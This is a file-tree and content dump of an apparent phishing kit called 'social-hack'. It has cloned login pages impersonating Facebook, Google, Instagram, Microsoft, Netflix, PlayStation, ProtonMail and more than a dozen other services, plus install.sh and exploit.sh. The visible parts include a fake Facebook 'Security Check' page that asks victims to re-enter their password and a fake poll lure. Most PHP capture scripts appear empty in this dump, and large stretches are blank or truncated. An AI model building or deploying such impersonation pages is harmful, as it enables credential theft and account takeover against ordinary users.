├── .sets ├── ebay │ ├── index.php │ ├── login.html │ └── login.php ├── facebook │ ├── index.php │ ├── login.html │ ├── login.php │ └── mobile.html ├── fb_security │ ├── fb-ico.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.png │ └── style.css ├── github │ ├── index.php │ ├── login.html │ └── login.php ├── google │ ├── avatar.png │ ├── google.png │ ├── index.php │ ├── login.html │ └── login.php ├── google_poll │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ └── result.html ├── ig_followers │ ├── index.php │ ├── login.html │ └── login.php ├── insta_followers │ ├── index.php │ ├── login.html │ └── login.php ├── instagram │ ├── 001bc33056c1.jpg │ ├── 2d9d7248af43.jpg │ ├── 4b70f6fae447.png │ ├── 629d23a3c7b2.jpg │ ├── 96f2557117a2.js.download │ ├── 9e7638226e17.png │ ├── aafd8c6b005d.jpg │ ├── b67d172d5783.js.download │ ├── d1f0f06b39df.js.download │ ├── f06b908907d5.png │ ├── f55c258e826e.png │ ├── f5ae123ab1e2.jpg │ ├── f9e5c0ca0804.js.download │ ├── fb48443ec9d3.png │ ├── index.php │ ├── lY4eZXm_YWu.html │ ├── login.html │ ├── login.php │ └── sdk.js.download ├── ip.php ├── linkedin │ ├── index.php │ ├── login.html │ ├── login.php │ └── mobile.html ├── microsoft │ ├── ConvergedLoginPaginatedStrings.EN.js │ ├── ConvergedLoginPaginatedStrings.js │ ├── ConvergedLogin_PCore.js │ ├── Converged_v21033.css │ ├── Converged_v21033.css2 │ ├── boot.css │ ├── boot.js │ ├── boot_002.js │ ├── boot_003.js │ ├── boot_004.js │ ├── ellipsis_grey.svg │ ├── ellipsis_white.svg │ ├── index.php │ ├── login.html │ ├── login.php │ ├── microsoft_logo.svg │ ├── prefetch.html │ ├── sprite1.css │ └── sprite1.png ├── netflix │ ├── FB-f-Logo__blue_57.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── none.css │ ├── none.js │ ├── none_002.js │ ├── sdk.js │ └── xaOI6zd9HW9.html ├── pinterest │ ├── index.php │ ├── login.php │ └── signin.php ├── playstation │ ├── 0a674de1f2362e0247eec6e1d770e │ ├── S9fUSTxhhOdrtoorjI9LLu91aXsPVT7Js_3UUxt2SGg.js.download │ ├── anchor.html │ ├── api.js.download │ ├── bframe.html │ ├── button_icon_password_off.png │ ├── index.php │ ├── kekka-22361ea3e8890b95e7b006a784440d01.css │ ├── kekka-6225c71c3ba0a25429287cf2bec55f12.js.download │ ├── loading.png │ ├── loading_base.png │ ├── login.html │ ├── login.php │ ├── logo_playstation.png │ ├── pc-7cc7759e91c65baf3b78fd4eb4402c4f.css │ ├── recaptcha__en_gb.js.download │ ├── saved_resource │ ├── saved_resource(1) │ ├── siews1lib.js.download │ ├── sony_logo.png │ ├── styles__ltr.css │ ├── ua-parser.min-03f60cd2f499bace751d5136d4fc67d4.js.download │ ├── unifiedfooter.en-gb.js.download │ ├── vendor-05c320ffd8d18cdbde15fa028ff545b7.js.download │ ├── vendor-571d67531622102402268bd2c623c17f.css │ └── wallpaper.jpg ├── protonmail │ ├── app.js │ ├── appLazy.js │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.png │ ├── openpgp.js │ ├── styles.css │ ├── vendor.js │ └── vendorLazy.js ├── quora │ ├── -4-chunk.web.main.js.out-34-ee935e0e4fc8f76d.webpack │ ├── -4-main.css-27-d85df81eef715f06.css │ ├── -4-web.entry.js.out-34-8f7d03da0b7a24ae.webpack │ ├── anchor.html │ ├── bframe.html │ ├── client_platform.js.download │ ├── iframe.html │ ├── index.php │ ├── login.html │ ├── login.php │ └── saved_resource.html ├── reddit │ ├── ProductionClient.62deff0b1c9fbf3af019.js │ ├── index.php │ ├── login.ec234f177c42a52ad0ff.js │ ├── login.html │ ├── login.php │ └── mobile.html ├── snapchat │ ├── index.php │ ├── login.php │ └── users.php ├── spotify │ ├── analytics.js │ ├── anchor.html │ ├── api.js │ ├── bframe.html │ ├── hVpKLs9k787xwHAhrfSZCIqM1XtnPD1dxAE7zC2jvTU.js │ ├── index.css │ ├── index.js │ ├── index.php │ ├── login.html │ ├── login.php │ ├── recaptcha__en.js │ └── styles__ltr.css ├── tiktok │ ├── index.php │ ├── jquery.min.js │ ├── jscript.js │ ├── login.html │ ├── login.php │ ├── logo.png │ ├── sadflix.ttf │ └── style.css ├── twitch │ ├── index.php │ ├── login.php │ └── user.php ├── twitter │ ├── index.php │ ├── login.html │ └── login.php ├── wordpress │ ├── index.php │ ├── load-styles.css │ ├── login.html │ ├── login.php │ └── wordpress-logo.svg └── yahoo │ ├── index.php │ ├── login.html │ ├── login.php │ ├── mobile.html │ └── yahoo_en-US_f_p_bestfit_2x.png ├── LICENSE ├── README.md ├── exploit.sh └── install.sh /.sets/ebay/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/ebay/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/facebook/index.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /.sets/facebook/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/fb_security/fb-ico.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/fb_security/fb-ico.png -------------------------------------------------------------------------------- /.sets/fb_security/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/fb_security/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Security Check 6 | 7 | 8 | 9 | 10 |
11 |
12 | 15 |
16 |
17 |
18 |
19 | 22 |
23 |

Verify needed to understand it's you

24 |

Enter your password for security reason (make sure your caps lock is off)

25 |

Forgot your password ? Request new one 26 |

27 | 28 | 39 | 40 |
41 | 42 | 67 |
68 | 69 | 70 | -------------------------------------------------------------------------------- /.sets/fb_security/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/fb_security/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/fb_security/logo.png -------------------------------------------------------------------------------- /.sets/fb_security/style.css: -------------------------------------------------------------------------------- 1 | h1, h2, h3, h4, h5, a, p, ul, li, img, header, section, div, body {margin: 0; padding: 0;} 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | header { 10 | width: 1348px; 11 | height: 84px; 12 | background: #3B5998; 13 | } 14 | 15 | .main-header { 16 | padding-left:184px; 17 | } 18 | 19 | 20 | 21 | .form { 22 | border: 1px solid #cccccc; 23 | border-radius: 5px; 24 | height: 420px; 25 | margin: 60px auto 45px; 26 | width: 641px; 27 | } 28 | 29 | .form h3 { 30 | color: #333333; 31 | border-bottom: 1.5px solid #cccccc; 32 | font-family: tahoma; 33 | font-size: 18px; 34 | font-weight: 600; 35 | margin: 0 20px; 36 | padding: 20px 0 12px; 37 | } 38 | .red-box { 39 | margin:24px auto 0; 40 | width: 600px; 41 | height: 97px; 42 | background: #FFEBE8; 43 | border: 1.5px solid red; 44 | } 45 | 46 | 47 | .red-box p { 48 | font-size: 10.5px; 49 | font-family: tahoma; 50 | padding: 14px 0 0 20px; 51 | } 52 | 53 | .red-box a { 54 | text-decoration: none; 55 | color: #3B5998; 56 | } 57 | 58 | .red-box a:hover { 59 | text-decoration: underline; 60 | } 61 | 62 | .login-form { 63 | width:75%; 64 | margin: 0 auto; 65 | padding: 23px 0 0 0; 66 | } 67 | .login-form label { 68 | font-family: tahoma; 69 | font-size: 13px; 70 | padding: 2px 10px 3px 5px; 71 | } 72 | .login-form input { 73 | padding: 2px 10px 3px 5px; 74 | } 75 | 76 | 77 | footer { 78 | width: 984px; 79 | margin:0 auto; 80 | border-top: 1.5px solid #cccccc; 81 | } 82 | 83 | ul li { 84 | display: inline; 85 | margin: 0 0 0 28px; 86 | } 87 | 88 | 89 | ul li a { 90 | text-decoration: none; 91 | font-family: tahoma; 92 | font-size: 10.5px; 93 | color: #3B5998; 94 | } 95 | ul li a:hover { 96 | text-decoration: underline; 97 | } 98 | -------------------------------------------------------------------------------- /.sets/github/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/github/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/google/avatar.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/google/avatar.png -------------------------------------------------------------------------------- /.sets/google/google.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/google/google.png -------------------------------------------------------------------------------- /.sets/google/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/google/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/google_poll/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/google_poll/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 22 | 23 | VoteRank #289032 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
32 |

VOTERANK

33 |

#289032

34 |
35 | 36 | 37 |
38 |
39 |
40 | What's your name?


41 | Select your favorite social networks:
42 | Facebook
43 | Twitter
44 | LinkedIn
45 | Instagram
46 | Snapchat
47 | Google+

48 |
49 |
50 | Select your favorite colors:
51 | Blue
52 | Red
53 | Green
54 | Yellow
55 | Purple
56 | Orange
57 | Black
58 | White
59 | Grey
60 | Brown
61 | Pink
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /.sets/google_poll/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/google_poll/login2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | VoteRank #289032 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 118 | 119 |
120 |

VOTERANK

121 |

#289032

122 |
123 | 124 | 136 | 137 | 138 | -------------------------------------------------------------------------------- /.sets/google_poll/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thank You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /.sets/ig_followers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/ig_followers/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/insta_followers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/insta_followers/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/instagram/001bc33056c1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/instagram/001bc33056c1.jpg -------------------------------------------------------------------------------- /.sets/instagram/2d9d7248af43.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/instagram/2d9d7248af43.jpg -------------------------------------------------------------------------------- /.sets/instagram/4b70f6fae447.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/instagram/4b70f6fae447.png -------------------------------------------------------------------------------- /.sets/instagram/629d23a3c7b2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/instagram/629d23a3c7b2.jpg -------------------------------------------------------------------------------- /.sets/instagram/9e7638226e17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/instagram/9e7638226e17.png -------------------------------------------------------------------------------- /.sets/instagram/aafd8c6b005d.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/instagram/aafd8c6b005d.jpg -------------------------------------------------------------------------------- /.sets/instagram/f06b908907d5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/instagram/f06b908907d5.png -------------------------------------------------------------------------------- /.sets/instagram/f55c258e826e.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/instagram/f55c258e826e.png -------------------------------------------------------------------------------- /.sets/instagram/f5ae123ab1e2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/instagram/f5ae123ab1e2.jpg -------------------------------------------------------------------------------- /.sets/instagram/fb48443ec9d3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/instagram/fb48443ec9d3.png -------------------------------------------------------------------------------- /.sets/instagram/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/instagram/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/linkedin/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/linkedin/mobile.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Sign In 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | 270 | 271 | 272 | 273 | 274 | 275 | 276 | 277 | 278 | 279 | 280 | 281 | 282 | 283 | 284 | 285 | 286 | 287 | 288 | 289 | 290 | 291 | 292 | 293 | 294 | 295 | 296 | 297 | 298 | 299 | 300 | 301 | 302 | 303 | 304 | 305 | 306 |
307 | 310 |
311 | 312 | 313 | 314 | 315 | 316 | 317 | 318 | 319 |
320 | 321 | 322 | 323 | 324 | 325 | 326 | 327 | 328 | 329 | 330 | 331 | 332 | 333 |
334 | Did you mean: ? 335 |
336 |
337 |
    338 |
  • 339 | 340 | 341 |
  • 342 |
  • 343 | 344 | 345 |
  • 346 |
347 |
348 | 349 |
350 |
351 | 352 |
353 | 357 |
358 | 359 | 360 | 361 | 362 | 363 | 364 |
365 | 366 | 367 | 368 | 369 | 370 | 371 |
372 | 373 | 374 | 375 | 376 |
377 | 378 | 379 |
380 | 381 | 382 | 383 | 384 | 385 |
386 | 387 | 388 | 389 | 390 | 391 | 392 | 393 |
394 |
395 | 396 | 397 | 398 | 399 | 400 | 401 | 402 | 403 | 404 | 405 | 406 | 407 | 408 | 409 | 410 | 411 | 412 | 413 | 414 | 415 | 416 | 417 | 418 | 419 | 420 | 421 | 422 | 423 | 424 | 425 | 426 | 427 | 428 | 429 | 430 | 431 | 432 | 433 | 434 | 435 | 436 | 437 | 438 | 439 | 440 | 441 | 442 | 443 | 444 | 445 | 446 | 447 | 448 | 449 | 450 | 451 | 452 | 453 | 454 | 455 | 456 | 457 | 458 | 459 | 460 | 461 | 462 | 463 | 464 | 465 | 466 | 467 | 468 | 469 | 470 | 471 | 472 | 473 | 474 | 475 | 476 | 477 | 478 | 479 | 480 | 481 | 482 | 483 | 484 | 485 | 486 | 487 | 533 | 534 | 535 | 536 | 537 | 538 | 539 | 540 | 541 | 542 | 543 | 544 | 545 | 546 | 547 | 548 | 549 | 550 | 551 | 552 | 553 | 554 | 555 | 556 | 557 | 558 | 559 | 560 | 561 | 562 | 563 | 564 | 565 | 568 | 569 | 570 | 571 | 572 | 573 | 574 | 575 | 576 | 577 | 578 | 579 | 580 | 581 | 582 | 583 | 584 | 585 | 586 | 587 | 588 | 589 | 590 | 591 | 592 | 593 | 603 | 604 | 605 | 606 | 607 | 608 | 609 | 610 | 611 | 612 | 613 | 614 | 615 | 616 | 617 | 618 | 619 | 620 | 621 | 622 | 623 | 624 | 625 | 626 | 627 | 628 | 629 | 630 | 631 | 632 | 633 | 634 | -------------------------------------------------------------------------------- /.sets/microsoft/ellipsis_grey.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /.sets/microsoft/ellipsis_white.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /.sets/microsoft/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/microsoft/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/microsoft/microsoft_logo.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /.sets/microsoft/prefetch.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Prefetch 5 | 6 | 7 | 8 | 14 | 15 | 16 | 20 | 21 | 22 | 23 | 24 | A -------------------------------------------------------------------------------- /.sets/microsoft/sprite1.css: -------------------------------------------------------------------------------- 1 | .image-adchoices_icon-png{background:url('adchoices_icon.png');width:12px;height:12px}.image-olk_logo_white_cropped-png{background:url('olk_logo_white_cropped.png');width:265px;height:310px}.image-owa_brand-png{background:url('owa_brand.png');width:160px;height:30px}.image-readingpane_recipientwell_callout-png{background:url('readingpane_recipientwell_callout.png');width:370px;height:245px}.image-loading_blackbg-gif{background:url('loading_blackbg.gif');width:16px;height:16px}.image-loading_whitebg-gif{background:url('loading_whitebg.gif');width:16px;height:16px}.image-thinking16_blue-gif{background:url('thinking16_blue.gif');width:16px;height:16px}.image-thinking16_grey-gif{background:url('thinking16_grey.gif');width:16px;height:16px}.image-thinking16_white-gif{background:url('thinking16_white.gif');width:16px;height:16px}.image-thinking24-gif{background:url('thinking24.gif');width:24px;height:24px}.image-thinking32_blue-gif{background:url('thinking32_blue.gif');width:32px;height:32px}.image-thinking32_grey-gif{background:url('thinking32_grey.gif');width:32px;height:32px}.image-thinking32_white-gif{background:url('thinking32_white.gif');width:32px;height:32px}.image-r_jpg-png{width:75px;height:75px;background:url('sprite1.mouse.png') -0 -0}.image-clutter_delete_all-png{width:32px;height:32px;background:url('sprite1.mouse.png') -77px -0}.image-clutter_delete_all_p-png{width:32px;height:32px;background:url('sprite1.mouse.png') -111px -0}.image-listview_buscheck_single-png{width:16px;height:32px;background:url('sprite1.mouse.png') -145px -0}.image-listview_buscheck_top-png{width:16px;height:32px;background:url('sprite1.mouse.png') -163px -0}.image-listview_busstop_bottom-png{width:16px;height:32px;background:url('sprite1.mouse.png') -181px -0}.image-listview_busstop_empty-png{width:16px;height:32px;background:url('sprite1.mouse.png') -199px -0}.image-listview_busstop_middle-png{width:16px;height:32px;background:url('sprite1.mouse.png') -217px -0}.image-office_logo_white_small-png{width:81px;height:26px;background:url('sprite1.mouse.png') -235px -0}.image-dc-gdoc-png{width:20px;height:20px;background:url('sprite1.mouse.png') -318px -0}.image-dc-gsheet-png{width:20px;height:20px;background:url('sprite1.mouse.png') -340px -0}.image-dc-gslide-png{width:20px;height:20px;background:url('sprite1.mouse.png') -362px -0}.image-fberror4-png{width:18px;height:18px;background:url('sprite1.mouse.png') -384px -0}.image-googerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -404px -0}.image-lierror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -424px -0}.image-sinweerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -444px -0}.image-twitrerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -464px -0}.image-yhooerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -484px -0}.image-abchactive1-png{width:16px;height:16px;background:url('sprite1.mouse.png') -504px -0}.image-chevrons_down-png{width:16px;height:16px;background:url('sprite1.mouse.png') -522px -0}.image-close_p-png{width:16px;height:16px;background:url('sprite1.mouse.png') -540px -0}.image-dc-accdb-png{width:16px;height:16px;background:url('sprite1.mouse.png') -558px -0}.image-dc-aspx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -576px -0}.image-dc-bmp-png{width:16px;height:16px;background:url('sprite1.mouse.png') -318px -22px}.image-dc-docx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -336px -22px}.image-dc-exe-png{width:16px;height:16px;background:url('sprite1.mouse.png') -354px -22px}.image-dc-generic-png{width:16px;height:16px;background:url('sprite1.mouse.png') -372px -22px}.image-dc-gif-png{width:16px;height:16px;background:url('sprite1.mouse.png') -390px -22px}.image-dc-jpg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -408px -22px}.image-dc-lync-png{width:16px;height:16px;background:url('sprite1.mouse.png') -426px -22px}.image-dc-mpg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -444px -22px}.image-dc-msg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -462px -22px}.image-dc-msg_attachment-png{width:16px;height:16px;background:url('sprite1.mouse.png') -480px -22px}.image-dc-one-png{width:16px;height:16px;background:url('sprite1.mouse.png') -498px -22px}.image-dc-pblsh-png{width:16px;height:16px;background:url('sprite1.mouse.png') -516px -22px}.image-dc-pdf-png{width:16px;height:16px;background:url('sprite1.mouse.png') -534px -22px}.image-dc-png-png{width:16px;height:16px;background:url('sprite1.mouse.png') -552px -22px}.image-dc-pptx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -570px -22px}.image-dc-rpmsg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -318px -40px}.image-dc-txt-png{width:16px;height:16px;background:url('sprite1.mouse.png') -336px -40px}.image-dc-vsd-png{width:16px;height:16px;background:url('sprite1.mouse.png') -354px -40px}.image-dc-wv-png{width:16px;height:16px;background:url('sprite1.mouse.png') -372px -40px}.image-dc-xlsx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -390px -40px}.image-dc-zip-png{width:16px;height:16px;background:url('sprite1.mouse.png') -408px -40px}.image-event_accepted-png{width:16px;height:16px;background:url('sprite1.mouse.png') -426px -40px}.image-event_declined-png{width:16px;height:16px;background:url('sprite1.mouse.png') -444px -40px}.image-event_tentative-png{width:16px;height:16px;background:url('sprite1.mouse.png') -462px -40px}.image-fbactive4-png{width:16px;height:16px;background:url('sprite1.mouse.png') -480px -40px}.image-googactive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -498px -40px}.image-liactive-png{width:16px;height:16px;background:url('sprite1.mouse.png') -516px -40px}.image-mark_not_clutter-png{width:16px;height:16px;background:url('sprite1.mouse.png') -534px -40px}.image-mark_not_clutter_h-png{width:16px;height:16px;background:url('sprite1.mouse.png') -552px -40px}.image-response_approve-png{width:16px;height:16px;background:url('sprite1.mouse.png') -570px -40px}.image-response_reject-png{width:16px;height:16px;background:url('sprite1.mouse.png') -318px -58px}.image-response_request-png{width:16px;height:16px;background:url('sprite1.mouse.png') -336px -58px}.image-sinweactive-png{width:16px;height:16px;background:url('sprite1.mouse.png') -354px -58px}.image-skypeactive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -372px -58px}.image-task_red-png{width:16px;height:16px;background:url('sprite1.mouse.png') -390px -58px}.image-task_red_h-png{width:16px;height:16px;background:url('sprite1.mouse.png') -408px -58px}.image-twitractive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -426px -58px}.image-voicemail_irm-png{width:16px;height:16px;background:url('sprite1.mouse.png') -444px -58px}.image-yhooactive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -462px -58px}.image-task_reoccurring-png{width:15px;height:16px;background:url('sprite1.mouse.png') -480px -58px}.image-task-png{width:14px;height:16px;background:url('sprite1.mouse.png') -497px -58px}.image-triangle_down_small-png{width:12px;height:12px;background:url('sprite1.mouse.png') -513px -58px}.image-navigation_close-png{width:11px;height:11px;background:url('sprite1.mouse.png') -527px -58px}.image-clear1x1-gif{width:1px;height:1px;background:url('sprite1.mouse.png') -540px -58px}.csimg{padding:0;border:none;background-repeat:no-repeat;-webkit-touch-callout:none}span.csimg{-ms-high-contrast-adjust:none} -------------------------------------------------------------------------------- /.sets/microsoft/sprite1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/microsoft/sprite1.png -------------------------------------------------------------------------------- /.sets/netflix/FB-f-Logo__blue_57.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/netflix/FB-f-Logo__blue_57.png -------------------------------------------------------------------------------- /.sets/netflix/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/netflix/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/pinterest/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/pinterest/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/playstation/S9fUSTxhhOdrtoorjI9LLu91aXsPVT7Js_3UUxt2SGg.js.download: -------------------------------------------------------------------------------- 1 | /* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ Function('var B=function(J,Q,W,v,a,g,u){J.L++;try{for(a=(g=(v=5001,W=J.l.length,0),void 0);(J.$||--v)&&(J.a||(g=J.C(215))a;a++)v[a]=String.fromCharCode(a);(V((V(J,(V(J,(V(J,(V(J,(V(J,74,(V(J,95,(V(J,(V(J,48,[160,0,(V(J,68,(V(J,(V(J,((V(J,(V(J,(V(J,(V(J,(V(J,(V(J,(a=(V(J,147,(V(J,166,(V(J,230,(V(J,(V(J,(J.i=(V(J,(V(J,(V(J,6,(V(J,113,(V((V(J,(V(J,111,(V(J,190,(J.uK=(V((V(J,(V(J,20,[0,(V(J,(V(J,196,((V(J,130,(V(J,(V(J,181,(J.pw=(V(J,219,(V(J,(J.a_=function(g){this.b=g},(J.b=J,J).w=(J.S=[],[]),215),0),0)),a=window.performance||{},a).timeOrigin||(a.timing||{}).navigationStart||0,function(g,u,k,F,t){V(g,(t=(k=(u=g.h(),g.h()),F=g.C(g.h()),g).C(g.h()),k=g.C(k),u),y(g,k,F,t))})),253),function(g){r(g,1)}),function(){})),V)(J,9,function(g,u,k,F){if(u=g.i.pop()){for(k=g.h();0>=(P=k&(1<<(F-=G,G))-1,G),P},t(3)+1),X=t(5),[]),0);I=P.length;)P.push(G.h());l=P[l]}O.push(l)}G.U=(G.a=G.v(h.slice(),G.h),G).v(O,G.h)})}),function(g,u){(u.push(g[0]<<24|g[1]<<16|g[2]<<8|g[3]),u).push(g[4]<<24|g[5]<<16|g[6]<<8|g[7]),u.push(g[8]<<24|g[9]<<16|g[10]<<8|g[11])}),function(g){Jh(g,1)})),q)(4)),129),J),J),80,function(g,u,k,F,t){for(t=(F=(u=g.h(),k=n(g),[]),0);t>k)})),function(g,u,k,F,t){(F=(k=(t=(u=(F=(k=(u=g.h(),g.h()),g).h(),g.C(u)),g).C(g.h()),g.C(k)),g).C(F),0!==u)&&(F=y(g,F,t,1,u,k),u.addEventListener(k,F,D),V(g,199,[u,k,F]))})),function(g,u,k){V(g,(u=(u=g.h(),k=g.h(),g.C(u)),k),gX(u))})),W.X||function(){}),30),function(g,u){E(g,1,5)||(u=Qg(g),V(g,u.I,u.H.apply(u.B,u.Y)))}),180),395),141),S),174),function(g,u,k){0!=(k=(u=g.h(),g.h()),g.C(u))&&V(g,215,g.C(k))}),50),function(g,u,k,F){(k=(u=g.h(),k=g.h(),F=g.h(),g).C(k),u=g.C(u),V)(g,F,u[k])}),126),2048),J).M=[],188),function(g,u,k,F,t,w,X){if(k=(u=g.h(),n(g)),F="",g.w[240])for(t=g.C(240),w=0,X=t.length;k--;)w=(w+n(g))%X